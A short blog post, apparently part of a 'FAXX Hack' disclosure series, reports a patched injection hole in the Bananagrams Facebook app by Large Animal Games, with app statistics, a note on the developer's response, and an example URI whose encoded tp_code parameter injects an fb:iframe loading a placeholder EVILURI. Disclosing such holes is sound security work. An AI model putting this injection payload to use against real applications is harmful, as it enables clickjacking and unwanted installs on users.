Sorry for not posting yesterday – I’ll post another FAXX Hack in a bit to make up for it.
Facebook Verified Application
Current Monthly Active Users: 22,215
Current Rank on Application Leaderboard: 1,165
Application Developer: Large Animal Games
Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/bananagrams/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E
Share with your friends!